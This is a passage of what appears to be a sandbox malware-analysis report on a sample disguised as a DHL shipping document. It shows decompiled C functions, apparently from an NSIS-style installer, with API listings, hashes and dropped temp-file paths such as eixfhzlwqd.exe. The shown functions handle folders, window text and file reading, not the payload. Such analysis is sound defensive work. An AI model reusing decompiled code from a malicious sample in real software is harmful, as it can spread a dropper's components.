										__imp__CoTaskMemFree(_v8);
										__eflags = _a8;
										if(_a8 != 0) {
											goto L26;
										}
										goto L24;
									}
									_t63 =  *_t59( *0x42a268,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
									__eflags = _t63;
									if(_t63 == 0) {
										goto L26;
									}
									goto L22;
								}
								goto L26;
							}
							GetSystemDirectoryW(_t108, 0x400);
							goto L26;
						} else {
							E00406536( *0x42a298, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x42a298 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
							if( *_t108 != 0) {
								L27:
								if(_v16 == 0x1a) {
									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L29;
							}
							E004066A5(_t77, _t105, _t108, _t108, _v16);
							L26:
							if( *_t108 == 0) {
								goto L29;
							}
							goto L27;
						}
					}
					goto L43;
				}
			}





























                                                              0x004066a5
                                                              0x004066a5
                                                              0x004066a5
                                                              0x004066ab
                                                              0x004066b0
                                                              0x004066c1
                                                              0x004066c1
                                                              0x004066c9
                                                              0x004066ca
                                                              0x004066cb
                                                              0x004066cc
                                                              0x004066cf
                                                              0x004066d7
                                                              0x004066d9
                                                              0x004066ea
                                                              0x004066ed
                                                              0x004066ed
                                                              0x004066f1
                                                              0x004066f7
                                                              0x004066fa
                                                              0x004068d5
                                                              0x004068d5
                                                              0x004068e0
                                                              0x004068ec
                                                              0x004068ec
                                                              0x00000000
                                                              0x00406700
                                                              0x00406705
                                                              0x0040671a
                                                              0x0040671b
                                                              0x00406721
                                                              0x004068b3
                                                              0x004068c1
                                                              0x004068c4
                                                              0x004068c4
                                                              0x004068b5
                                                              0x004068b8
                                                              0x004068bb
                                                              0x004068bd
                                                              0x004068bd
                                                              0x004068c6
                                                              0x004068c6
                                                              0x004068cc
                                                              0x004068cf
                                                              0x00406702
                                                              0x00000000
                                                              0x00406702
                                                              0x00000000
                                                              0x004068cf
                                                              0x00406727
                                                              0x0040672a
                                                              0x00406739
                                                              0x00406740
                                                              0x0040674c
                                                              0x0040674f
                                                              0x00406752
                                                              0x00406753
                                                              0x00406758
                                                              0x0040675e
                                                              0x00406761
                                                              0x00406764
                                                              0x00406857
                                                              0x0040685c
                                                              0x0040688f
                                                              0x00406894
                                                              0x00406899
                                                              0x0040689e
                                                              0x0040689e
                                                              0x004068a3
                                                              0x004068a9
                                                              0x004068ac
                                                              0x00000000
                                                              0x004068ac
                                                              0x0040685e
                                                              0x00406861
                                                              0x00406864
                                                              0x00406879
                                                              0x00406880
                                                              0x00406866
                                                              0x0040686d
                                                              0x0040686d
                                                              0x00406888
                                                              0x0040688b
                                                              0x0040684f
                                                              0x00406850
                                                              0x00406850
                                                              0x00000000
                                                              0x0040688b
                                                              0x00406771
                                                              0x00406775
                                                              0x00406775
                                                              0x00406776
                                                              0x00406778
                                                              0x004067b5
                                                              0x004067b8
                                                              0x004067c8
                                                              0x004067cb
                                                              0x004067d3
                                                              0x004067d9
                                                              0x004067d9
                                                              0x00406834
                                                              0x00406834
                                                              0x00406836
                                                              0x00000000
                                                              0x00000000
                                                              0x004067dd
                                                              0x004067e2
                                                              0x004067e3
                                                              0x004067e5
                                                              0x004067fc
                                                              0x0040680a
                                                              0x00406810
                                                              0x00406812
                                                              0x00406830
                                                              0x00406830
                                                              0x00406830
                                                              0x00000000
                                                              0x00406830
                                                              0x00406818
                                                              0x00406821
                                                              0x00406824
                                                              0x0040682a
                                                              0x0040682e
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x0040682e
                                                              0x004067f6
                                                              0x004067f8
                                                              0x004067fa
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x004067fa
                                                              0x00000000
                                                              0x00406834
                                                              0x004067c0
                                                              0x00000000
                                                              0x0040677a
                                                              0x00406798
                                                              0x004067a1
                                                              0x0040683e
                                                              0x00406842
                                                              0x0040684a
                                                              0x0040684a
                                                              0x00000000
                                                              0x00406842
                                                              0x004067ab
                                                              0x00406838
                                                              0x0040683c
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x0040683c
                                                              0x00406778
                                                              0x00000000
                                                              0x00406705

                                                              APIs
                                                              • GetSystemDirectoryW.KERNEL32("C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe" C:\Users\user\AppData\Local\Temp\lfcykkdw.xwy,00000400), ref: 004067C0
                                                              • GetWindowsDirectoryW.KERNEL32("C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe" C:\Users\user\AppData\Local\Temp\lfcykkdw.xwy,00000400,00000000,00422728,?,00405701,00422728,00000000,00000000,00000000,00000000), ref: 004067D3
                                                              • lstrcatW.KERNEL32("C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe" C:\Users\user\AppData\Local\Temp\lfcykkdw.xwy,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                              • lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe" C:\Users\user\AppData\Local\Temp\lfcykkdw.xwy,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.325407828.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.325399231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325416433.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000047D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_DHL_SHIPPING_DOCUMENT.jbxd
                                                              Similarity
                                                              • API ID: Directory$SystemWindowslstrcatlstrlen
                                                              • String ID: "C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe" C:\Users\user\AppData\Local\Temp\lfcykkdw.xwy$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                              • API String ID: 4260037668-924177837
                                                              • Opcode ID: 1c129aaeae4721ad32508ffaab04e099ccdaef91abef8552f1ca909acb5604ca
                                                              • Instruction ID: 414c90a3e727c3679fd522760d05a71ccfd37451a898d0680c6fb4b4ce958948
                                                              • Opcode Fuzzy Hash: 1c129aaeae4721ad32508ffaab04e099ccdaef91abef8552f1ca909acb5604ca
                                                              • Instruction Fuzzy Hash: CD61E172A02115EBDB20AF64CD40BAA37A5EF10314F22C13EE946B62D0DB3D49A1CB5D
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 004056CA Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E004056CA(signed int _a4, WCHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				WCHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t27;
				signed int _t28;
				long _t29;
				signed int _t37;
				signed int _t38;

				_t27 =  *0x429244;
				_v8 = _t27;
				if(_t27 != 0) {
					_t37 =  *0x42a314;
					_v12 = _t37;
					_t38 = _t37 & 0x00000001;
					if(_t38 == 0) {
						E004066A5(_t38, 0, 0x422728, 0x422728, _a4);
					}
					_t27 = lstrlenW(0x422728);
					_a4 = _t27;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t27 = SetWindowTextW( *0x429228, 0x422728);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x422728;
							_v52 = 1;
							_t29 = SendMessageW(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t38;
							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52);
							_t27 = SendMessageW(_v8, 0x1013, _v48, 0);
						}
						if(_t38 != 0) {
							_t28 = _a4;
							0x422728[_t28] = 0;
							return _t28;
						}
					} else {
						_t27 = lstrlenW(_a8) + _a4;
						if(_t27 < 0x1000) {
							_t27 = lstrcatW(0x422728, _a8);
							goto L6;
						}
					}
				}
				return _t27;
			}

















                                                              0x004056d0
                                                              0x004056da
                                                              0x004056df
                                                              0x004056e5
                                                              0x004056f0
                                                              0x004056f3
                                                              0x004056f6
                                                              0x004056fc
                                                              0x004056fc
                                                              0x00405702
                                                              0x0040570a
                                                              0x0040570d
                                                              0x0040572a
                                                              0x0040572e
                                                              0x00405737
                                                              0x00405737
                                                              0x00405741
                                                              0x0040574a
                                                              0x00405756
                                                              0x0040575d
                                                              0x00405761
                                                              0x00405764
                                                              0x00405777
                                                              0x00405785
                                                              0x00405785
                                                              0x00405789
                                                              0x0040578b
                                                              0x0040578e
                                                              0x00000000
                                                              0x0040578e
                                                              0x0040570f
                                                              0x00405717
                                                              0x0040571f
                                                              0x00405725
                                                              0x00000000
                                                              0x00405725
                                                              0x0040571f
                                                              0x0040570d
                                                              0x0040579a

                                                              APIs
                                                              • lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                              • lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                              • lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                                                              • SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                              • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                                • Part of subcall function 004066A5: lstrcatW.KERNEL32("C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe" C:\Users\user\AppData\Local\Temp\lfcykkdw.xwy,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                                • Part of subcall function 004066A5: lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe" C:\Users\user\AppData\Local\Temp\lfcykkdw.xwy,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.325407828.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.325399231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325416433.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000047D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_DHL_SHIPPING_DOCUMENT.jbxd
                                                              Similarity
                                                              • API ID: MessageSendlstrlen$lstrcat$TextWindow
                                                              • String ID: ('B
                                                              • API String ID: 1495540970-2332581011
                                                              • Opcode ID: ecaae210665ee7222a04207821391202ddee9f1067a944388ad148c6c7792cdb
                                                              • Instruction ID: 7f52a71d89202be05388d2ae90ba5930d13dcc1e6093ad3ff4eaa481a322a782
                                                              • Opcode Fuzzy Hash: ecaae210665ee7222a04207821391202ddee9f1067a944388ad148c6c7792cdb
                                                              • Instruction Fuzzy Hash: C6217A71900518FACB119FA5DD84A8EBFB8EB45360F10857AF904B62A0D67A4A509F68
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0040462B Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E0040462B(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongW(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}









                                                              0x0040463d
                                                              0x004046f3
                                                              0x00000000
                                                              0x004046f3
                                                              0x0040464e
                                                              0x00404652
                                                              0x00000000
                                                              0x0040466c
                                                              0x0040466c
                                                              0x00404675
                                                              0x00000000
                                                              0x00000000
                                                              0x00404677
                                                              0x00404683
                                                              0x00404686
                                                              0x00404686
                                                              0x0040468c
                                                              0x00404692
                                                              0x00404692
                                                              0x0040469e
                                                              0x004046a4
                                                              0x004046ab
                                                              0x004046ae
                                                              0x004046b1
                                                              0x004046b3
                                                              0x004046b3
                                                              0x004046bb
                                                              0x004046c1
                                                              0x004046c1
                                                              0x004046cb
                                                              0x004046d0
                                                              0x004046d3
                                                              0x004046d8
                                                              0x004046db
                                                              0x004046db
                                                              0x004046eb
                                                              0x004046eb
                                                              0x00000000
                                                              0x004046ee

                                                              APIs
                                                              • GetWindowLongW.USER32(?,000000EB), ref: 00404648
                                                              • GetSysColor.USER32(00000000), ref: 00404686
                                                              • SetTextColor.GDI32(?,00000000), ref: 00404692
                                                              • SetBkMode.GDI32(?,?), ref: 0040469E
                                                              • GetSysColor.USER32(?), ref: 004046B1
                                                              • SetBkColor.GDI32(?,?), ref: 004046C1
                                                              • DeleteObject.GDI32(?), ref: 004046DB
                                                              • CreateBrushIndirect.GDI32(?), ref: 004046E5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.325407828.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.325399231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325416433.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000047D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_DHL_SHIPPING_DOCUMENT.jbxd
                                                              Similarity
                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                              • String ID:
                                                              • API String ID: 2320649405-0
                                                              • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                              • Instruction ID: e78b8cc9c8042372c9a7340b9b8aa9b23ded286a9f8ddc7240a2e2d8bd1f46c0
                                                              • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                              • Instruction Fuzzy Hash: DE2197715007049FC7309F28D908B5BBBF8AF42714F008D2EE992A22E1D739D944DB58
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 004026EC Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 87%
                                                              			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t72;
				void* _t76;
				void* _t79;

				_t72 = __edx;
				 *((intOrPtr*)(_t76 - 8)) = __ebx;
				_t65 = 2;
				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
				_t66 = E00402D84(_t65);
				_t79 = _t66 - 1;
				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
				if(_t79 < 0) {
					L36:
					 *0x42a2e8 =  *0x42a2e8 +  *(_t76 - 4);
				} else {
					__ecx = 0x3ff;
					if(__eax > 0x3ff) {
						 *(__ebp - 0x44) = 0x3ff;
					}
					if( *__edi == __bx) {
						L34:
						__ecx =  *(__ebp - 0xc);
						__eax =  *(__ebp - 8);
						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
						if(_t79 == 0) {
							 *(_t76 - 4) = 1;
						}
						goto L36;
					} else {
						 *(__ebp - 0x38) = __ebx;
						 *(__ebp - 0x18) = E004065C8(__ecx, __edi);
						if( *(__ebp - 0x44) > __ebx) {
							do {
								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E00406239( *(__ebp - 0x18), __ebx) >= 0) {
										__eax = __ebp - 0x50;
										if(E004061DB( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
											goto L34;
										} else {
											goto L21;
										}
									} else {
										goto L34;
									}
								} else {
									__eax = __ebp - 0x40;
									_push(__ebx);
									_push(__ebp - 0x40);
									__eax = 2;
									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
									if(__eax == 0) {
										goto L34;
									} else {
										__ecx =  *(__ebp - 0x40);
										if(__ecx == __ebx) {
											goto L34;
										} else {
											__ax =  *(__ebp + 0xa) & 0x000000ff;
											 *(__ebp - 0x4c) = __ecx;
											 *(__ebp - 0x50) = __eax;
											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
												L28:
												__ax & 0x0000ffff = E004065AF( *(__ebp - 0xc), __ax & 0x0000ffff);
											} else {
												__ebp - 0x50 = __ebp + 0xa;
												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
													L21:
													__eax =  *(__ebp - 0x50);
												} else {
													__edi =  *(__ebp - 0x4c);
													__edi =  ~( *(__ebp - 0x4c));
													while(1) {
														_t22 = __ebp - 0x40;
														 *_t22 =  *(__ebp - 0x40) - 1;
														__eax = 0xfffd;
														 *(__ebp - 0x50) = 0xfffd;
														if( *_t22 == 0) {
															goto L22;
														}
														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
														__edi = __edi + 1;
														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
														__eax = __ebp + 0xa;
														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
															continue;
														} else {
															goto L21;
														}
														goto L22;
													}
												}
												L22:
												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
													goto L28;
												} else {
													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
														} else {
															__ecx =  *(__ebp - 0xc);
															__edx =  *(__ebp - 8);
															 *(__ebp - 8) =  *(__ebp - 8) + 1;
															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														}
														goto L34;
													} else {
														__ecx =  *(__ebp - 0xc);
														__edx =  *(__ebp - 8);
														 *(__ebp - 8) =  *(__ebp - 8) + 1;
														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														 *(__ebp - 0x38) = __eax;
														if(__ax == __bx) {
															goto L34;
														} else {
															goto L26;
														}
													}
												}
											}
										}
									}
								}
								goto L37;
								L26:
								__eax =  *(__ebp - 8);
							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
						}
						goto L34;
					}
				}
				L37:
				return 0;
			}








                                                              0x004026ec
                                                              0x004026ee
                                                              0x004026f1
                                                              0x004026f3
                                                              0x004026f6
                                                              0x004026fb
                                                              0x004026ff
                                                              0x00402702
                                                              0x00402705
                                                              0x00402c2a
                                                              0x00402c2d
                                                              0x0040270b
                                                              0x0040270b
                                                              0x00402712
                                                              0x00402714
                                                              0x00402714
                                                              0x0040271a
                                                              0x0040287e
                                                              0x0040287e
                                                              0x00402881
                                                              0x00402886
                                                              0x004015b6
                                                              0x0040292e
                                                              0x0040292e
                                                              0x00000000
                                                              0x00402720
                                                              0x00402721
                                                              0x0040272c
                                                              0x0040272f
                                                              0x0040273b
                                                              0x0040273f
                                                              0x004027d7
                                                              0x004027ef
                                                              0x004027ff
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00402745
                                                              0x00402745
                                                              0x00402748
                                                              0x00402749
                                                              0x0040274c
                                                              0x00402751
                                                              0x00402758
                                                              0x00402760
                                                              0x00000000
                                                              0x00402766
                                                              0x00402766
                                                              0x0040276b
                                                              0x00000000
                                                              0x00402771
                                                              0x00402771
                                                              0x00402779
                                                              0x0040277c
                                                              0x0040277f
                                                              0x0040283a
                                                              0x00402841
                                                              0x00402785
                                                              0x0040278b
                                                              0x00402797
                                                              0x00402801
                                                              0x00402801
                                                              0x00402799
                                                              0x00402799
                                                              0x0040279c
                                                              0x0040279e
                                                              0x0040279e
                                                              0x0040279e
                                                              0x004027a1
                                                              0x004027a6
                                                              0x004027a9
                                                              0x00000000
                                                              0x00000000
                                                              0x004027ab
                                                              0x004027ae
                                                              0x004027bc
                                                              0x004027c2
                                                              0x004027d0
                                                              0x00000000
                                                              0x004027d2
                                                              0x00000000
                                                              0x004027d2
                                                              0x00000000
                                                              0x004027d0
                                                              0x0040279e
                                                              0x00402804
                                                              0x00402807
                                                              0x00000000
                                                              0x00402809
                                                              0x0040280e
                                                              0x0040284f
                                                              0x00402871
                                                              0x00402878
                                                              0x0040285d
                                                              0x0040285d
                                                              0x00402860
                                                              0x00402863
                                                              0x00402866
                                                              0x00402866
                                                              0x00000000
                                                              0x00402817
                                                              0x00402817
                                                              0x0040281a
                                                              0x0040281d
                                                              0x00402823
                                                              0x00402827
                                                              0x0040282a
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x0040282a
                                                              0x0040280e
                                                              0x00402807
                                                              0x0040277f
                                                              0x0040276b
                                                              0x00402760
                                                              0x00000000
                                                              0x0040282c
                                                              0x0040282c
                                                              0x0040282f
                                                              0x00402838
                                                              0x00000000
                                                              0x0040272f
                                                              0x0040271a
                                                              0x00402c33
                                                              0x00402c39

                                                              APIs
                                                              • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                                                                • Part of subcall function 00406239: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0040624F
                                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.325407828.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.325399231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325416433.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000047D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_DHL_SHIPPING_DOCUMENT.jbxd
                                                              Similarity
                                                              • API ID: File$Pointer$ByteCharMultiWide$Read
                                                              • String ID: 9
                                                              • API String ID: 163830602-2366072709
                                                              • Opcode ID: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
                                                              • Instruction ID: 581cf2785626502de532f206a1de9da9d9b8d20bcd24121b7f7bd1133decb9a2
                                                              • Opcode Fuzzy Hash: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
                                                              • Instruction Fuzzy Hash: CE51FB75D00219AADF20EF95CA88AAEBB75FF04304F50417BE541B62D4D7B49D82CB58
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 004068EF Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 91%
                                                              			E004068EF(WCHAR* _a4) {
				short _t5;
				short _t7;
				WCHAR* _t19;
				WCHAR* _t20;
				WCHAR* _t21;

				_t20 = _a4;
				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
					_t20 =  &(_t20[4]);
				}
				if( *_t20 != 0 && E00405FAE(_t20) != 0) {
					_t20 =  &(_t20[2]);
				}
				_t5 =  *_t20;
				_t21 = _t20;
				_t19 = _t20;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((short*)(E00405F64(L"*?|<>/\":", _t5))) == 0) {
							E00406113(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
							_t19 = CharNextW(_t19);
						}
						_t20 = CharNextW(_t20);
						_t5 =  *_t20;
					} while (_t5 != 0);
				}
				 *_t19 =  *_t19 & 0x00000000;
				while(1) {
					_push(_t19);
